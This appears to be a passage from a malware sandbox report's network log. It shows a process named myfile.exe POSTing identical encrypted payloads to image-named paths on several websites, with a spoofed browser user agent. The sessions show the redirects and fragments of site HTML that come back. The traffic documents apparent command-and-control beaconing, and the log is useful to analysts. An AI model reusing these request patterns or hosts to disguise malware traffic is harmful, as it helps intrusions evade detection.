                                                              2024-09-09 10:07:16 UTC223INData Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 70 34 30 34 5f 65 78 65 63 6c 75 64 65 5f 6d 65 64 69 61 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 75 38 38 32 38 39 31 30 37 31 2f 64 6f 6d 61 69 6e 73 2f 6d 32 67 72 61 70 68 2e 66 72 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 6c 2d 34 30 34 2d 72 65 64 69 72 65 63 74 2d 74 6f 2d 68 6f 6d 65 70 61 67 65 2f 61 6c 6c 2d 34 30 34 2d 72 65 64 69 72 65 63 74 2d 74 6f 2d 68 6f 6d 65 70 61 67 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 39 38 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                              Data Ascii: <br /><b>Notice</b>: Undefined index: p404_execlude_media in <b>/home/u882891071/domains/m2graph.fr/public_html/wp-content/plugins/all-404-redirect-to-homepage/all-404-redirect-to-homepage.php</b> on line <b>98</b><br />


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.449745208.73.140.704437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:17 UTC282OUTPOST /content/images/gv.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: stanleyqualitysystems.com
                                                              2024-09-09 10:07:17 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:17 UTC235INHTTP/1.1 301 Moved Permanently
                                                              Date: Mon, 09 Sep 2024 10:07:17 GMT
                                                              Server: Apache
                                                              Location: https://karnesstanleyhvac.com/content/images/gv.png
                                                              Content-Length: 259
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              2024-09-09 10:07:17 UTC259INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 72 6e 65 73 73 74 61 6e 6c 65 79 68 76 61 63 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 67 76 2e 70 6e 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://karnesstanleyhvac.com/content/images/gv.png">here</a>.</p></body></ht


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.449746208.73.140.704437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:17 UTC216OUTGET /content/images/gv.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: karnesstanleyhvac.com
                                                              2024-09-09 10:07:18 UTC382INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:17 GMT
                                                              Server: Apache
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://karnesstanleyhvac.com/wp-json/>; rel="https://api.w.org/"
                                                              Upgrade: h2,h2c
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              2024-09-09 10:07:18 UTC7810INData Raw: 31 66 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 20 6c 74 69 65 38 20 6c 74 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 20 6c 74 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65
                                                              Data Ascii: 1f10<!DOCTYPE html>...[if IE 7]><html class="ie ie7 ltie8 ltie9" lang="en-US"><![endif]-->...[if IE 8]><html class="ie ie8 ltie9" lang="en-US"><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang="en-US">...<![endif]--><head><meta charse
                                                              2024-09-09 10:07:18 UTC148INData Raw: 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 25 33 41 33 30 30 25 32 43 33 30 30 69 74 61 6c 69 63 25 32 43 72 65 67 75 6c 61 72 25 32 43 69 74 61 6c 69 63 25 32 43 36 30 30 25 32 43 36 30 30 69 74 61 6c 69 63 25 32 43 37 30 30 25 32 43 37 30 30 69 74 61 6c 69 63 25 32 43 38 30 30 25 32 43 38 30 30 69 74 61 6c 69 63 26 23
                                                              Data Ascii: href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#
                                                              2024-09-09 10:07:18 UTC2INData Raw: 0d 0a
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.449747188.114.97.34437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:18 UTC272OUTPOST /content/temp/pg.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: altitudeboise.com
                                                              2024-09-09 10:07:18 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:19 UTC1140INHTTP/1.1 302 Found
                                                              Date: Mon, 09 Sep 2024 10:07:19 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              P3P: CP="This is not a P3P policy! See https://www.clkmg.com for more info."
                                                              Location: https://altitudetrampolinepark.com
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Access-Control-Allow-Origin: undefined-origin
                                                              Access-Control-Allow-Credentials: true
                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                              Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                              Access-Control-Max-Age: 300
                                                              X-CM-FE: httpfe-1
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1; mode=block
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xYaewO4Ppw7ufUIXdVhUuqJ9NnFyIBnY8r%2FsBM%2F29w4uMBnWR1OY5xkxniKyQp1MqupyZrZoJRxq1Wso%2FDLUoRVnlE91znDilRuNh6%2B1EuHd7kKmKEEtLF2l4XMqTXRF0PUcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c065ee00ca26a56-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:19 UTC224INData Raw: 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 69 74 75 64 65 74 72 61 6d 70 6f 6c 69 6e 65 70 61 72 6b 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                              Data Ascii: da<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://altitudetrampolinepark.com">here</a>.</p></body></html>
                                                              2024-09-09 10:07:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.449748172.67.71.2174437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:19 UTC200OUTGET / HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: altitudetrampolinepark.com
                                                              2024-09-09 10:07:19 UTC692INHTTP/1.1 301 Moved Permanently
                                                              Date: Mon, 09 Sep 2024 10:07:19 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 54
                                                              Connection: close
                                                              location: https://www.altitudetrampolinepark.com/
                                                              x-nf-request-id: 01J7B412TXF8Z9BNS8WKCWMNJY
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XZUU8PLYkg61Rmo8uj%2BYCXsrC1xk%2Fmboo2y3ZcHalyeHNg3QYthu%2FZtHvb6bAmEyFlCU%2BXdlqKw4vxivxBMyij0X3BtGwPDGxFeZZmMKzwuTO608N0M52Hp1DkaLGRb2NSmLJGgR%2Fj1ARxg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c065ee53aa51a1f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:19 UTC54INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6c 74 69 74 75 64 65 74 72 61 6d 70 6f 6c 69 6e 65 70 61 72 6b 2e 63 6f 6d 2f
                                                              Data Ascii: Redirecting to https://www.altitudetrampolinepark.com/


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.449749104.26.0.1204437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:20 UTC204OUTGET / HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.altitudetrampolinepark.com
                                                              2024-09-09 10:07:20 UTC908INHTTP/1.1 200 OK
                                                              Date: Mon, 09 Sep 2024 10:07:20 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Age: 0
                                                              Cache-Control: public,max-age=0,must-revalidate
                                                              cache-status: "Netlify Edge"; fwd=stale
                                                              referrer-policy: no-referrer-when-downgrade
                                                              vary: Accept-Encoding
                                                              x-content-type-options: nosniff
                                                              x-frame-options: SAMEORIGIN
                                                              x-nf-request-id: 01J7B413F97MBTJ79GMXHVFG0F
                                                              x-xss-protection: 1; mode=block
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2XO9KODDyVW1NC0qIvqB73PTncxhTfOS%2FjPCBowRvSH1%2BMcsJ5MC67%2Bn5bPQuvxGaSvy89Z%2FseRP2d69elucXsxuallBGI8JtWvtHK%2BwAbcJKxCVJ5Ne0WFt%2BmGJIuovtjAQtxB7AqZK8KPszYrLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c065ee93d7e42c0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:20 UTC461INData Raw: 37 63 32 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 6e 2d 68 65 61 64 2d 73 73 72 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 73 73 72 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 64 61 74 61 2d 68 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c
                                                              Data Ascii: 7c25<!doctype html><html data-n-head-ssr lang="en" data-n-head="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D"><head><meta data-n-head="ssr" charset="utf-8"><meta data-n-head="ssr" name="viewport" data-hid="viewport" content="width=device-width,initial-scal
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 69 74 75 64 65 20 54 72 61 6d 70 6f 6c 69 6e 65 20 50 61 72 6b 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22
                                                              Data Ascii: b-app-capable" name="mobile-web-app-capable" content="yes"><meta data-n-head="ssr" data-hid="apple-mobile-web-app-title" name="apple-mobile-web-app-title" content="Altitude Trampoline Park"><meta data-n-head="ssr" data-hid="theme-color" name="theme-color"
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 6c 69 6e 65 2c 20 6b 69 64 73 2c 20 79 6f 75 6e 67 2c 20 6a 75 6d 70 2c 20 62 69 72 74 68 64 61 79 2c 20 6e 69 6e 6a 61 2c 20 74 75 6d 62 6c 65 2c 20 74 75 6d 62 6c 69 6e 67 2c 20 70 61 72 74 79 2c 20 66 61 6d 69 6c 79 2c 20 66 75 6e 2c 20 69 6e 64 6f 6f 72 2c 20 61 63 74 69 76 69 74 79 2c 20 61 63 74 69 76 69 74 69 65 73 2c 20 6a 75 6d 70 69 6e 67 2c 20 64 6f 64 67 65 62 61 6c 6c 2c 20 72 75 6e 2c 20 73 6b 79 2c 20 74 68 72 69 6c 6c 2c 20 74 68 72 69 6c 6c 73 74 72 61 6d 70 6f 6c 69 6e 65 2c 20 6b 69 64 73 2c 20 79 6f 75 6e 67 2c 20 6a 75 6d 70 2c 20 62 69 72 74 68 64 61 79 2c 20 6e 69 6e 6a 61 2c 20 74 75 6d 62 6c 65 2c 20 74 75 6d 62 6c 69 6e 67 2c 20 70 61 72 74 79 2c 20 66 61 6d 69 6c 79 2c 20 66 75 6e 2c 20 69 6e 64 6f 6f 72 2c 20 61 63 74 69 76 69
                                                              Data Ascii: line, kids, young, jump, birthday, ninja, tumble, tumbling, party, family, fun, indoor, activity, activities, jumping, dodgeball, run, sky, thrill, thrillstrampoline, kids, young, jump, birthday, ninja, tumble, tumbling, party, family, fun, indoor, activi
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 61 38 32 32 30 36 62 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 32 32 39 30 34 62 35 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 37 66 32 65 61 39 61 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 62 34 34 34 61 32 37 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22
                                                              Data Ascii: script"><link rel="preload" href="/_nuxt/a82206b.js" as="script"><link rel="preload" href="/_nuxt/22904b5.js" as="script"><link rel="preload" href="/_nuxt/7f2ea9a.js" as="script"><link rel="preload" href="/_nuxt/b444a27.js" as="script"><link rel="preload"
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22 53 65 67 6f 65 20 55 49 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 3b 6d 61 72 67 69 6e 3a 30 7d 68 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 68 65 69 67 68 74 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c
                                                              Data Ascii: ,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji";margin:0}hr{color:inherit;height:0}abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underl
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 41 72 69 61 6c 2c 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b
                                                              Data Ascii: tem-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif,BlinkMacSystemFont,"Segoe UI","Helvetica Neue",Arial,"Noto Sans","Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";line-height:1.5}body{font-family:inherit;
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 32 30 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 34 34 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 34 34 30 70 78 7d 7d 2e 61 62 73 6f 6c 75 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 73 74 69 63 6b 79 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 7d 2e 6d 78 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6d 78 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f
                                                              Data Ascii: }@media (min-width:1200px){.container{max-width:1200px}}@media (min-width:1440px){.container{max-width:1440px}}.absolute{position:absolute}.relative{position:relative}.sticky{position:sticky}.mx-1{margin-left:5px;margin-right:5px}.mx-auto{margin-left:auto
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 20 73 6b 65 77 58 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 78 29 29 20 73 6b 65 77 59 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 79 29 29 20 73 63 61 6c 65 58 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 78 29 29 20 73 63 61 6c 65 59 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 79 29 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 69 6e 67 7b 37 35 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 32 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 75 6c 73 65 7b 35 30 25 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b
